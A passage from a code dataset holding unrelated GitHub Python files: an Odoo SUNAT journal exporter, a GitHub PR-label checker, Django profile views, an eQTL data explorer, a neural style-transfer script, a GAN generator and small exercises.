                     ('12', 'December')])\n    date_year = fields.Char(string=\"Year\", size=4)\n\n    state = fields.Selection([('choose', 'choose'), ('get', 'get')], default='choose')\n    txt_filename = fields.Char('filename', readonly=True)\n    txt_binary = fields.Binary('file', readonly=True)\n\n    @api.multi\n    def generate_file(self):\n        dominio = [('move_id.state', 'not like', 'draft'),\n                   ('month_year_inv', 'like', self.date_month + 
\"\" + self.date_year)\n                   ]\n\n        # Data\n        lst_account_move_line = self.env['account.move.line'].search(dominio)\n\n        content_txt = \"\"\n\n        # Iterator\n        for line in lst_account_move_line:\n            # Accounting entry\n\n            date_document = \"\"\n            if line.invoice_id.date_document:\n                date_document = line.invoice_id.date_document.strftime(\"%d/%m/%Y\")\n\n            date_invoice = \"\"\n            if line.invoice_id.date_invoice:\n                date_invoice = line.invoice_id.date_invoice.strftime(\"%d/%m/%Y\")\n\n            date_due = \"\"\n            if line.invoice_id.date_due:\n                date_due = line.invoice_id.date_due.strftime(\"%d/%m/%Y\")\n\n            name = \"\"\n            if line.invoice_id.number:\n                name = line.invoice_id.number.replace(\"/\", \"\")\n\n            concatenado = \"\"\n            if line.move_id.name:\n                concatenado = line.move_id.name\n            if line.invoice_id.name:\n                if len(concatenado) > 0:\n                    concatenado = concatenado + \",\" + line.invoice_id.name\n                else:\n                    concatenado = line.invoice_id.name\n            if line.ref:\n                if len(concatenado) > 0:\n                    concatenado = concatenado + \",\" + line.ref\n                else:\n                    concatenado = line.ref\n            if line.partner_id.name:\n                if len(concatenado) > 0:\n                    concatenado = concatenado + \",\" + line.partner_id.name\n                else:\n                    concatenado = line.partner_id.name\n\n            # 20 -> Type\n            campo_20 = \"\"\n            if line.journal_id.type == \"purchase\" and line.partner_id.person_type != \"03-Sujeto no Domiciliado\":\n                campo_20 = \"080200\"\n            if line.journal_id.type == \"purchase\" and line.partner_id.person_type == \"03-Sujeto no Domiciliado\":\n                campo_20 = \"080100\"\n            if line.journal_id.type == \"sale\":\n                campo_20 = \"140100\"\n\n            # 21 -> Dates\n            campo_operacion = ''\n            if line.invoice_id.date_invoice and line.invoice_id.date_document:\n                if line.invoice_id.date_invoice.strftime(\"%m%Y\") == line.invoice_id.date_document.strftime(\"%m%Y\"):\n                    campo_operacion = '1'\n                else:\n                    if line.invoice_id.date_invoice.strftime(\"%Y\") != line.invoice_id.date_document.strftime(\"%Y\"):\n                        campo_operacion = '9'\n                    else:\n                        if int(line.invoice_id.date_invoice.strftime(\"%m\")) == int(\n                                line.invoice_id.date_document.strftime(\"%m\")) - 1:\n                            campo_operacion = '0'\n                        else:\n                            campo_operacion = '9'\n\n            if line.invoice_id:\n                txt_line = \"%s00|%s|M%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s\" % (\n                    line.date.strftime(\"%Y%m\") or '',  # -> 01\n                    name or '',  # -> 02\n                    line.journal_id.id or '',  # -> 03\n                    line.account_id.code or '',  # -> 04\n                    line.company_id.id or '',  # -> 05\n                    line.analytic_account_id.name or '',  # -> 06\n                    line.invoice_id.currency_id.name or '',  # -> 07\n                    line.partner_id.catalog_06_id.code or '',  # -> 08|\n                    line.partner_id.vat or '',  # -> 09\n                    line.invoice_id.document_type_id.number or '',  # -> 10\n                    line.invoice_id.invoice_serie or '',  # -> 11\n                    line.invoice_id.invoice_number or '',  # -> 12\n                    date_invoice or '',  # -> 13\n                    date_due or '',  # -> 14\n                    date_document or '',  # -> 15\n                    concatenado or '',  # -> 16\n                    line.ref or '',  # -> 17\n                    line.debit or 0.0,  # -> 18\n                    line.credit or 0.0,  # -> 19\n                    # line.move_id.name.replace(\"/\", \"\") or '',  # -> 20\n                    campo_20 or '',  # -> 20\n                    campo_operacion or '',  # -> 21\n                    '' or ''  # -> 22\n                )\n\n                # Append the line to the TXT output\n                content_txt = content_txt + \"\" + txt_line + \"\\r\\n\"\n\n        self.write({\n            'state': 'get',\n            'txt_binary': base64.b64encode(content_txt.encode('ISO-8859-1')),\n            'txt_filename': \"LE2060158712320190200050100001111.txt\"\n        })\n        return {\n            'type': 'ir.actions.act_window',\n            'name': 'Consolidated Journal',\n            'res_model': 'sunat.consolidated_journal',\n            'view_mode': 'form',\n            'view_type': 'form',\n            'res_id': self.id,\n            'target': 'new'\n        
}\n","repo_name":"kit9/DemoClienteVero","sub_path":"sunat/wizard/consolidated_journal.py","file_name":"consolidated_journal.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"5130037816","text":"from typing import Any, Set, Tuple\n\nimport requests\n\n# For a PR to be properly labeled it should have one primary label and one secondary label\n\n# Should specify the type of change\nPRIMARY_LABELS = {\n    \"type: new feature\",\n    \"type: bug\",\n    \"type: enhancement\",\n    \"type: misc\",\n}\n\n# Should specify what has been modified\nSECONDARY_LABELS = {\n    \"topic: documentation\",\n    \"module: datasets\",\n    \"module: io\",\n    \"module: models\",\n    \"module: transforms\",\n    \"module: utils\",\n    \"ext: api\",\n    \"ext: demo\",\n    \"ext: docs\",\n    \"ext: notebooks\",\n    \"ext: references\",\n    \"ext: scripts\",\n    \"ext: tests\",\n    \"topic: build\",\n    \"topic: ci\",\n    \"topic: docker\",\n}\n\nGH_ORG = \"mindee\"\nGH_REPO = \"doctr\"\n\n\ndef query_repo(cmd: str, *, accept) -> Any:\n    response = requests.get(f\"https://api.github.com/repos/{GH_ORG}/{GH_REPO}/{cmd}\", headers=dict(Accept=accept))\n    return response.json()\n\n\ndef get_pr_merger_and_labels(pr_number: int) -> Tuple[str, Set[str]]:\n    # See https://docs.github.com/en/rest/reference/pulls#get-a-pull-request\n    data = query_repo(f\"pulls/{pr_number}\", accept=\"application/vnd.github.v3+json\")\n    merger = data.get(\"merged_by\", {}).get(\"login\")\n    labels = {label[\"name\"] for label in data[\"labels\"]}\n    return merger, labels\n\n\ndef main(args):\n    merger, labels = get_pr_merger_and_labels(args.pr)\n    is_properly_labeled = bool(PRIMARY_LABELS.intersection(labels) and SECONDARY_LABELS.intersection(labels))\n    if isinstance(merger, str) and not is_properly_labeled:\n        print(f\"@{merger}\")\n\n\ndef parse_args():\n    import argparse\n\n    parser = argparse.ArgumentParser(\n        description=\"PR label checker\", formatter_class=argparse.ArgumentDefaultsHelpFormatter\n    )\n\n    parser.add_argument(\"pr\", type=int, help=\"PR number\")\n    args = parser.parse_args()\n\n    return args\n\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    main(args)\n","repo_name":"mindee/doctr","sub_path":".github/verify_pr_labels.py","file_name":"verify_pr_labels.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1900,"dataset":"github-code","pt":"35"}
{"seq_id":"29105149785","text":"expressao = input(\"\\nEnter the expression: \").strip()\npilha = []\n\nfor i in expressao:\n    \n    if i == '(':\n        pilha.append(i)\n    \n    elif i == ')':\n        \n        if len(pilha) > 0:\n            pilha.pop()\n        \n        else:\n            pilha.append(i)\n    \nif len(pilha) == 0:\n    print(\"Your expression is valid!\\n\")\n\nelse:\n    print(\"Your expression is invalid!\\n\")","repo_name":"henrique-tavares/Coisas","sub_path":"Python/Mundo 3/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"37056658011","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom .forms import UserUpdateForm\nfrom .models import User\nfrom .tasks import send_deactivation_email\n\n\n@login_required\ndef profile(request):\n    context = {\n        'title': 'My Profile',\n        'user': 
request.user,\n 'listings': request.user.get_listings(),\n 'search_profiles': request.user.get_search_profiles(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": '#',\n }\n }\n return render(request, 'users/profile.html', context)\n\n\n@login_required\ndef properties(request):\n user_listings = request.user.get_listings()\n context = {\n 'title': 'My Properties',\n 'active': user_listings.active(),\n 'inactive': user_listings.inactive(),\n 'pending': user_listings.pending(),\n 'has_listings': request.user.has_listings(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Properties\": '#',\n }\n }\n return render(request, 'users/properties.html', context)\n\n\n@login_required\ndef bookmarks(request):\n context = {\n 'title': 'Bookmarked Properties',\n 'bookmarks': request.user.get_bookmarks(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Bookmarked\": '#',\n }\n }\n return render(request, 'users/bookmarks.html', context)\n\n\n@login_required\ndef update(request):\n context = {'title': 'Update Profile',\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Update\": \"#\"\n }\n }\n\n if request.method == 'POST':\n form = UserUpdateForm(request.POST, request.FILES, instance=request.user)\n context.update({'form': form})\n if form.changed_data and form.is_valid():\n form.save()\n messages.info(request, \"Account updated successfully!\")\n else:\n return render(request, 'users/update.html', context)\n return redirect(reverse('accounts:profile'))\n form = UserUpdateForm(instance=request.user)\n context.update({'form': form})\n return render(request, 'users/update.html', context)\n\n\ndef publisher(request, identifier):\n try:\n user = User.objects.prefetch_related('listings__city').get(identifier=identifier)\n except User.DoesNotExist:\n raise Http404(\"User does not exist.\")\n if user == request.user:\n messages.info(request, \"You have been redirected to your own profile.\")\n return redirect(reverse('accounts:profile'))\n\n context = {\n 'title': 'Publisher',\n 'publisher': user,\n 'listings': user.get_listings(),\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Publisher\": '#',\n }\n\n }\n return render(request, 'users/publisher.html', context)\n\n\n@login_required\ndef deactivate_account(request):\n context = {\n 'title': 'Deactivate Account',\n 'crumbs': {\n \"Home\": reverse('index'),\n \"Account\": reverse('accounts:profile'),\n \"Deactivate\": \"#\"\n }\n }\n if request.method == 'POST':\n request.user.deactivate()\n send_deactivation_email.delay(request.user.pk)\n logout(request)\n messages.info(request, \"Your account has been disabled! 
We are sorry to see you go.")\n return redirect(reverse('index'))\n return render(request, 'users/deactivate.html', context)\n","repo_name":"DonExo/NajdistanDjango3.0","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"26648267882","text":"\ndef greeting(name):\n\n    print(\"Hello, \" + name)\n\nperson1 = {\n    \"name\": \"Rith\",\n    \"age\": 21,\n    \"country\": \"Cambodia\"\n}\n\n\nclass Person():\n    def __init__(self, fname, lname):\n        self.firstName = fname\n        self.lastName = lname\n    \n    def displayName(self):\n        print(self.firstName, self.lastName)\n\n\nclass Student(Person):\n    pass\nstudentName = Student(\"Bo\", \"Rith\")\nstudentName.displayName()\n\nif 50 == 30:\n    print(\"True!\")\nelse:\n    print(\"False!\")\n\n\nif 5 > 3 and 2 < 5:\n    print(\"Good!\")\nelse:\n    print(\"Not Good!\")\n\n\nif 4 > 8 or 5 > 0:\n    print(\"Yes!\")\nelse:\n    print(\"No!\")\n\n\nif not(5 > 1 or 5 < 10):\n    print(\"kdkdkd\")\nelse:\n    print(\"aaaaa\")\n\n","repo_name":"borith23/test2","sub_path":"myModule.py","file_name":"myModule.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"28732756982","text":"class Solution:\n    def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:\n        def helper(arr, k):\n            ans = -float('Inf')\n            pre_sum = 0\n            dic = [0]\n            for item in arr:\n                pre_sum += item\n                index = bisect.bisect_left(dic, pre_sum-k)\n                if index> bits): # bit_length() does not exist in upython / value.bit_length() > bits:\r\n        raise ValueError('That value does not fit in that many bits')\r\n    else:\r\n        result <<= bits\r\n        mask = ((1 << bits) - 1)\r\n        result |= (value & mask)\r\n    return result\r\n    \r\ndef get_analog(type_value, value):\r\n    if type_value == 0:\r\n        return int.from_bytes((struct.pack('>H',value)), 'big'),analog_types['t0']\r\n    elif type_value == 1:\r\n        return int.from_bytes((struct.pack('>h',value)), 'big'),analog_types['t1']\r\n    elif type_value == 2:\r\n        return int.from_bytes((struct.pack('>I',value)), 'big'),analog_types['t2']\r\n    elif type_value == 3:\r\n        return int.from_bytes((struct.pack('>i',value)), 'big'),analog_types['t3']\r\n    elif type_value == 4:\r\n        return int.from_bytes((struct.pack('>f',value)), 'big'),analog_types['t4']\r\n    else:\r\n        raise TypeError\r\n    \r\ndef get_bit_length(number):\r\n    i = 0\r\n    while (number >> i):\r\n        i += 1\r\n    return i\r\n\r\ndef main():\r\n\r\n    trama = Iridium()\r\n    Header(trama,[15,15,255,10,0,0,0,1])\r\n    #Header(trama,[0,0,1,10])\r\n    Message1(trama,2,[1,1])\r\n    Message2(trama,4,[1,0,0,0],[0,0,0,1],[4294967295,10,10,10])\r\n    Message4(trama,1,[4],[3.1415],1024)\r\n    Message4(trama,5,[0,1,2,3,4],[1,-1,1,-1,2.0],1024)\r\n    Message6(trama,2,[32,32],[1,1],[1024,1024])\r\n    reporte, bitsize = trama.encode()\r\n    print(\"{:b}\".format(reporte))\r\n    print(bitsize)\r\n    report_bytes =reporte.to_bytes(bitsize//8,'big')\r\n    print(report_bytes.hex())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"TwinDimensionIOT/TwinDimension-CircuitPython-Examples","sub_path":"lib/kineis/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":8918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"45050385715","text":"import argparse\nimport sys\nfrom os.path import isfile\nimport os\nimport sumstats.api_v1.utils.filesystem_utils as fsutils\nimport 
sumstats.api_v1.trait.search.access.trait_service as trait_service\nimport sumstats.api_v1.study.search.access.study_service as study_service\nimport sumstats.api_v1.chr.search.access.chromosome_service as chrom_service\nimport sumstats.api_v1.chr.search.chromosome_search as chr_search\nimport sumstats.api_v1.utils.sqlite_client as sql_client\nimport sumstats.api_v1.chr.retriever as cr\nfrom sumstats.api_v1.errors.error_classes import *\nfrom sumstats.api_v1.utils import properties_handler\nfrom sumstats.api_v1.utils.properties_handler import properties\nfrom sumstats.api_v1.common_constants import *\n\n\nclass Explorer:\n def __init__(self, config_properties=None):\n self.properties = properties_handler.get_properties(config_properties)\n self.search_path = properties_handler.get_search_path(self.properties)\n self.study_dir = self.properties.study_dir\n self.trait_dir = self.properties.trait_dir\n self.sqlite_db = self.properties.sqlite_path\n self.trait_file = os.path.join(self.search_path, self.trait_dir, \"file_phen_meta.sqlite\")\n\n def get_list_of_studies(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies()\n return sorted(list(set(studies)))\n\n def get_list_of_traits(self):\n service = trait_service.TraitService(self.trait_file)\n traits = service.list_traits()\n return traits\n\n def get_list_of_genes(self):\n service = trait_service.TraitService(self.trait_file)\n genes = service.list_genes()\n return genes\n\n def get_list_of_studies_for_trait(self, trait): \n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies_for_trait(trait)\n if studies:\n return sorted(list(set(studies)))\n else:\n raise NotFoundError(\"Trait \" + trait)\n\n def get_list_of_tissues(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n tissues = sq.get_tissue_ontos()\n return sorted(list(set(tissues)))\n\n def get_tissue_ont_dict(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n tissue_ont_dict = sq.get_tissue_ont_dict()\n return tissue_ont_dict\n\n def get_qtl_list(self):\n sq = sql_client.sqlClient(self.sqlite_db)\n qtl_list = sq.get_qtl_list()\n return sorted(list(set(qtl_list)))\n\n def get_studies_of_tissue(self, tissue): \n sq = sql_client.sqlClient(self.sqlite_db)\n studies = sq.get_studies_for_tissue(tissue)\n if studies:\n return sorted(list(set(studies)))\n else:\n raise NotFoundError(\"Tissue \" + tissue)\n\n def get_trait_of_study(self, study_to_find):\n sq = sql_client.sqlClient(self.sqlite_db)\n traits = sq.get_traits_for_study(study_to_find)\n if traits:\n return sorted(list(set(traits)))\n else:\n # study not found\n raise NotFoundError(\"Study \" + study_to_find)\n\n\n def has_trait(self, trait):\n service = trait_service.TraitService(self.trait_file)\n #search = cr.search_all_assocs(trait=trait, start=0, size=0, properties=self.properties)\n #if search[-1] > 0:\n # return True\n if service.has_trait(trait):\n return True\n raise NotFoundError(\"Trait \" + trait)\n \n\n\n def has_gene(self, gene):\n service = trait_service.TraitService(self.trait_file)\n #search = cr.search_all_assocs(gene=gene, start=0, size=0, properties=self.properties)\n #if search[-1] > 0:\n # return True\n if service.has_gene(gene):\n return True\n raise NotFoundError(\"Gene \" + gene)\n\n def check_study(self, study):\n sq = sql_client.sqlClient(self.sqlite_db)\n if sq.check_study(study):\n return True\n raise NotFoundError(\"Study \" + study)\n\n\n\n def get_list_of_chroms(self):\n #return CHROMOSOMES\n return sorted(CHROMOSOMES)\n\n\n def has_chromosome(self, 
chromosome):\n # raises Not Found Error\n \"\"\"To do: Store the chromosome list as an attribute in the hdf5 file.\"\"\"\n h5files = fsutils.get_h5files_in_dir(self.search_path, self.study_dir)\n #chromosomes = []\n #for h5file in h5files:\n # service = trait_service.StudyService(h5file=h5file)\n # traits.extend(service.list_traits())\n # service.close_file()\n search = cr.search_all_assocs(chromosome=chromosome, start=0, size=0, properties=self.properties)\n if search[-1] > 0:\n print('checked')\n return True\n raise NotFoundError(\"Chromosome \" + str(chromosome))\n\n\ndef get_study_attr(h5file):\n service = study_service.StudyService(h5file=h5file)\n study = service.study\n service.close_file()\n return study\n\n\ndef get_trait_attr(h5file):\n service = study_service.StudyService(h5file=h5file)\n traits = service.traits\n service.close_file()\n return traits\n\n\ndef main():\n\n args = argument_parser(sys.argv[1:]) # pragma: no cover\n explorer = Explorer(properties) # pragma: no cover\n\n if args.molecular_phenotypes: # pragma: no cover\n traits = explorer.get_list_of_traits()\n for trait in traits:\n print(trait)\n\n if args.genes: # pragma: no cover\n genes = explorer.get_list_of_genes()\n for gene in genes:\n print(gene)\n\n if args.molecular_phenotype is not None: # pragma: no cover\n studies = explorer.get_list_of_studies_for_trait(args.molecular_phenotype)\n for study in studies:\n print(study)\n\n if args.chromosomes: # pragma: no cover\n chroms = explorer.get_list_of_chroms()\n for chrom in chroms:\n print(chrom)\n\n if args.studies: # pragma: no cover\n studies = explorer.get_list_of_studies()\n for study in studies:\n print(study)\n\n if args.study is not None: # pragma: no cover\n traits = explorer.get_trait_of_study(args.study)\n if traits is None:\n print(\"The study does not exist: \", args.study)\n else:\n for trait in traits:\n print(trait + \":\" + args.study)\n\n\n if args.tissues: # pragma: no cover\n tissues = explorer.get_list_of_tissues()\n for tissue in tissues:\n print(tissue)\n\n if args.tissue is not None: # pragma: no cover\n studies = explorer.get_studies_of_tissue(args.tissue)\n study_list = [study for study in studies]\n if studies is None:\n print(\"The tissue does not exist: \", args.tissue)\n else:\n print(\"Tissue \" + args.tissue + \" belongs to the following studies: \" + ','.join(study_list))\n\nif __name__ == \"__main__\":\n main() # pragma: no cover\n\n\ndef argument_parser(args):\n parser = argparse.ArgumentParser() # pragma: no cover\n parser.add_argument('-molecular_phenotypes', action='store_true', help='List all the molecular_phenotypes') # pragma: no cover\n parser.add_argument('-molecular_phenotype', help='List all the studies for a molecular_phenotype') # pragma: no cover\n parser.add_argument('-studies', action='store_true', help='List all the studies') # pragma: no cover\n parser.add_argument('-study', help='Will list \\'trait: study\\' if it exists') # pragma: no cover\n parser.add_argument('-tissues', action='store_true', help='List all the tissues') # pragma: no cover\n parser.add_argument('-tissue', help='Will list \\'study: tissue\\' if it exists') # pragma: no cover\n parser.add_argument('-chromosomes', action='store_true', help='Will list all the chromosomes') # pragma: no cover\n parser.add_argument('-genes', action='store_true', help='List all the genes') # pragma: no cover\n properties_handler.set_properties() # pragma: no cover\n\n return parser.parse_args(args) # pragma: no 
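Because argument_parser above takes an argv list instead of reading sys.argv itself, the flag-to-query wiring can be exercised without a shell. A hypothetical smoke test — it assumes the sumstats package is importable and its properties files are configured:

from sumstats.api_v1.explorer import Explorer, argument_parser

args = argument_parser(['-studies', '-chromosomes'])
assert args.studies and args.chromosomes and not args.tissues

explorer = Explorer()                    # default config properties
print(explorer.get_list_of_chroms())     # sorted chromosome labels, no DB access needed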
cover\n","repo_name":"eQTL-Catalogue/eQTL-SumStats","sub_path":"sumstats/api_v1/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"8316049690","text":"print(\"Welcome!\")\r\nprint(\"Lets play Madlibs! Please enter the following ↓\")\r\n\r\nadj = input(\"Type in an adjective: \")\r\nverb1 = input(\"Type in a verb: \")\r\nverb2 = input(\"Type in another verb: \")\r\nfamous_person = input(\"Lastly, type in a famous person: \")\r\n\r\nmadlib = \"Games are so {adj}, they make me so excited all the time because I love to {verb1}. Stay hydrated and {verb2} like you're {famous_person}\".format(adj=adj, verb1=verb2, verb2=verb2, famous_person=famous_person)\r\n\r\nprint(madlib)\r\n","repo_name":"ibotsh/Madlib","sub_path":"Madlib.py","file_name":"Madlib.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3944589872","text":"import tensorflow_hub as hub\nimport cv2\nfrom PIL import Image\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport IPython.display as display\nimport os\nimport tensorflow as tf\nfrom torchvision import transforms\nimport json\nfrom utils.models import get_pretrained_mobile_net\nfrom utils.config import config\nimport torch\n\n# Load compressed models from tensorflow_hub\nos.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'\n\nmpl.rcParams['figure.figsize'] = (12, 12)\nmpl.rcParams['axes.grid'] = False\n\nhub_model = hub.load(\n 'https://tfhub.dev/google/magenta/arbitrary-image-stylization-v1-256/2')\n\n# define a function to load pictures, limited to 512 pixels\ndef tensor_to_image(tensor):\n tensor = tensor*255\n tensor = np.array(tensor, dtype=np.uint8)\n if np.ndim(tensor) > 3:\n assert tensor.shape[0] == 1\n tensor = tensor[0]\n return Image.fromarray(tensor)\n\ndef style_transfer(output_path, style_images, content_image):\n i=0\n sentiments = []\n for style in style_images:\n stylized_image = hub_model(tf.constant(\n content_image), tf.constant(style))[0]\n output = tensor_to_image(stylized_image)\n output = np.array(output)\n cv2.imwrite(output_path + '_stylized'+ str(i)+ '.jpeg', output)\n img = Image.open(output_path + '_stylized'+ str(i)+ '.jpeg')\n img = img.convert('RGB')\n\n convert_tensor = transforms.ToTensor()\n img = convert_tensor(img)\n\n sentiment = style_eval([img], output_path)\n sentiments.append(sentiment[0])\n # style_eval(output, output_path)\n i=i+1\n _write_json_metadata(sentiments, output_path)\n\n# evaluate valence and arousal value of stylized image\ndef style_eval(styled_output, output_path):\n image_sentiment_model = \"./models/image_sentiment.model\"\n sentiment_model = get_pretrained_mobile_net()\n sentiment_model.to(config['device'])\n sentiment_model.load_state_dict(torch.load(image_sentiment_model))\n \n\n # Feed-forward image sentiment analysis\n eval_images = torch.stack(styled_output).to(config['device'])\n sentiment = sentiment_model(eval_images)\n return sentiment\n\ndef _write_json_metadata(predictions, output_path):\n metadata = []\n # print(len(predictions))\n for i in range(len(predictions)):\n metadata.append({\n 'image_arousal': float(predictions[i][0]),\n 'image_valence': float(predictions[i][1]),\n })\n\n with open(output_path + '_stylized.json', \"w\") as f:\n json.dump(metadata, 
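In the Madlib record above, the format() call binds verb1=verb2, so the first verb the player types never reaches the output. A corrected version of that line; the f-string variant keeps each slot visibly paired with its value:

madlib = ("Games are so {adj}, they make me so excited all the time because "
          "I love to {verb1}. Stay hydrated and {verb2} like you're "
          "{famous_person}").format(adj=adj, verb1=verb1, verb2=verb2,
                                    famous_person=famous_person)

# Equivalent f-string:
madlib = (f"Games are so {adj}, they make me so excited all the time because "
          f"I love to {verb1}. Stay hydrated and {verb2} like you're {famous_person}")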
f)","repo_name":"trrrrr2312/MusicEmotion","sub_path":"utils/add_style.py","file_name":"add_style.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70945178660","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass CA_NET(nn.Module):\r\n def __init__(self, embed_dim, is_cuda=True):\r\n super(CA_NET, self).__init__()\r\n self.t_dim = 1024\r\n self.c_dim = embed_dim\r\n self.fc = nn.Linear(self.t_dim, self.c_dim * 2, bias=True)\r\n self.relu = nn.ReLU()\r\n self.is_cuda = is_cuda\r\n\r\n def encode(self, text_embedding):\r\n x = self.relu(self.fc(text_embedding))\r\n mu = x[:, :self.c_dim]\r\n logvar = x[:, self.c_dim:]\r\n return mu, logvar\r\n\r\n def reparametrize(self, mu, logvar):\r\n std = logvar.mul(0.5).exp_()\r\n if self.is_cuda:\r\n eps = torch.cuda.FloatTensor(std.size()).normal_()\r\n else:\r\n eps = torch.FloatTensor(std.size()).normal_()\r\n #eps = Variable(eps)\r\n return eps.mul(std).add_(mu)\r\n\r\n def forward(self, text_embedding):\r\n mu, logvar = self.encode(text_embedding)\r\n c_code = self.reparametrize(mu, logvar)\r\n return c_code, mu, logvar\r\n\r\ndef KL_loss(mu, logvar):\r\n # -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\r\n KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\r\n KLD = torch.mean(KLD_element).mul_(-0.5)\r\n return KLD\r\n\r\n\r\n# ================ RESNET GENERATOR\r\n\r\ndef conv3x3(in_planes, out_planes, stride=1):\r\n \"3x3 convolution with padding\"\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\r\n padding=1, bias=False)\r\n\r\n\r\n# Upsale the spatial size by a factor of 2\r\ndef upBlock(in_planes, out_planes):\r\n block = nn.Sequential(\r\n nn.Upsample(scale_factor=2, mode='nearest'),\r\n conv3x3(in_planes, out_planes),\r\n nn.BatchNorm2d(out_planes),\r\n nn.ReLU(True))\r\n return block\r\n\r\n\r\nclass ResBlock(nn.Module):\r\n def __init__(self, channel_num):\r\n super(ResBlock, self).__init__()\r\n self.block = nn.Sequential(\r\n conv3x3(channel_num, channel_num),\r\n nn.BatchNorm2d(channel_num),\r\n nn.ReLU(True),\r\n conv3x3(channel_num, channel_num),\r\n nn.BatchNorm2d(channel_num))\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n def forward(self, x):\r\n residual = x\r\n out = self.block(x)\r\n out += residual\r\n out = self.relu(out)\r\n return out\r\n\r\nclass Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n self.gf_dim = 128 #cfg.GAN.GF_DIM\r\n self.ef_dim = 256 #cfg.GAN.CONDITION_DIM\r\n self.z_dim = 100 #cfg.Z_DIM\r\n self.define_module()\r\n\r\n def _make_layer(self, block, channel_num):\r\n layers = []\r\n for i in range(4):#cfg.GAN.R_NUM\r\n layers.append(block(channel_num))\r\n return nn.Sequential(*layers)\r\n\r\n def define_module(self):\r\n ngf = self.gf_dim\r\n # TEXT.DIMENSION -> GAN.CONDITION_DIM\r\n self.ca_net = CA_NET(self.ef_dim)\r\n self.linear = nn.Linear(self.ef_dim+self.z_dim, ngf * 4 * 16 * 16)\r\n self.hr_joint = nn.Sequential(\r\n nn.BatchNorm2d(ngf * 4),\r\n nn.ReLU(True)\r\n )\r\n self.residual = self._make_layer(ResBlock, ngf * 4)\r\n # --> 2ngf x 32 x 32\r\n self.upsample1 = upBlock(ngf * 4, ngf*2)\r\n # --> ngf x 64 x 64\r\n self.upsample2 = upBlock(ngf*2, ngf)\r\n # --> ngf // 2 x 128 x 128\r\n self.upsample3 = upBlock(ngf, ngf // 2)\r\n # --> ngf // 4 x 256 x 256\r\n self.upsample4 = upBlock(ngf // 2, ngf // 4)\r\n # --> 3 x 256 x 256\r\n self.img = nn.Sequential(\r\n conv3x3(ngf // 2, 3),\r\n 
nn.Tanh())\r\n\r\n def forward(self, text_embedding, noise):\r\n c_code, mu, logvar = self.ca_net(text_embedding)\r\n i_c_code = torch.cat([noise, c_code], 1)\r\n i_c_code = self.linear(i_c_code)\r\n i_c_code = i_c_code.view(i_c_code.size(0), 4*self.gf_dim, 16, 16)\r\n h_code = self.hr_joint(i_c_code)\r\n h_code = self.residual(h_code)\r\n h_code = self.upsample1(h_code)\r\n h_code = self.upsample2(h_code)\r\n h_code = self.upsample3(h_code)\r\n\r\n fake_img = self.img(h_code)\r\n return fake_img, mu, logvar\r\n\r\n# ================ Disc 128x128\r\ndef Block3x3_leakRelu(in_planes, out_planes):\r\n block = nn.Sequential(\r\n conv3x3(in_planes, out_planes),\r\n nn.BatchNorm2d(out_planes),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return block\r\n\r\n\r\n# Downsale the spatial size by a factor of 2\r\ndef downBlock(in_planes, out_planes):\r\n block = nn.Sequential(\r\n nn.Conv2d(in_planes, out_planes, 4, 2, 1, bias=False),\r\n nn.BatchNorm2d(out_planes),\r\n nn.LeakyReLU(0.2, inplace=True)\r\n )\r\n return block\r\n\r\n\r\n# Downsale the spatial size by a factor of 16\r\ndef encode_image_by_16times(ndf):\r\n encode_img = nn.Sequential(\r\n # --> state size. ndf x in_size/2 x in_size/2\r\n nn.Conv2d(3, ndf, 4, 2, 1, bias=False),\r\n nn.LeakyReLU(0.2, inplace=True),\r\n # --> state size 2ndf x x in_size/4 x 